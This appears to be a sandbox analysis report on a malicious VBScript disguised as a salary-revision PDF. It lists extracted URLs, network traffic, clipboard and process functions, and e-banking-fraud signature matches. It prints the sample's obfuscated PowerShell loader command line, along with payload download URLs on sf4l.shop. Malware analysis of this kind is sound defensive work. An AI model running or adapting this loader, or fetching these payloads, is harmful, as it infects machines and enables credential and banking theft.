              Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E55FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: bhv528A.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
              Source: bhv528A.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv528A.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv528A.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv528A.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: bhv528A.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv528A.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
              Source: bhv528A.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
              Source: bhv528A.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv528A.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1487804584.000001C4E640C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sf4l.shop
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sf4l.shop/
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sf4l.shop/zWAbmrmP/Diwani.pfbP
              Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sf4l.shop/zWAbmrmP/Diwani.pfbXR
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2646463919.0000000020060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.bin
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binzw
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv528A.tmp.11.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49930 version: TLS 1.2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041183A OpenClipboard,GetLastError,11_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR

              System Summary

              barindex
              Source: Initial file: Call Drivhjulenes.ShellExecute(elektrolytterne, Chr(34) & Essayistisk & Chr(34), "", "", Hjlpeprogrammernes)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB79BEA22_2_00007FFAAB79BEA2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB79B0F62_2_00007FFAAB79B0F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB86926A2_2_00007FFAAB86926A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB86AB4A2_2_00007FFAAB86AB4A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C2EDF04_2_04C2EDF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C2F6C04_2_04C2F6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C2EAA84_2_04C2EAA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_209171947_2_20917194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2090B5C17_2_2090B5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B04011_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043610D11_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044731011_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A49011_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040755A11_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043C56011_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B61011_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044D6C011_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004476F011_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B87011_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044081D11_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041495711_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004079EE11_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407AEB11_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044AA8011_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00412AA911_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404B7411_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404B0311_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044BBD811_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404BE511_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00404C7611_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00415CFE11_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416D7211_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00446D3011_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00446D8B11_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406E8F11_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040503812_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041208C12_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004050A912_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040511A12_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043C13A12_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004051AB12_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044930012_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040D32212_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A4F012_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043A5AB12_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041363112_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044669012_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A73012_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004398D812_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004498E012_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A88612_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043DA0912_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00438D5E12_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00449ED012_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041FE8312_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00430F5412_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004050C213_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004014AB13_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040513313_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004051A413_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040124613_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040CA4613_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040523513_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004032C813_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040168913_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00402F6013_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: Salary Revision_pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5336
              Source: unknownProcess created: Commandline size = 5336
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5336Jump to behavior
              Source: wscript.exe, 00000000.00000003.1350102325.0000023D996B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: delsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt 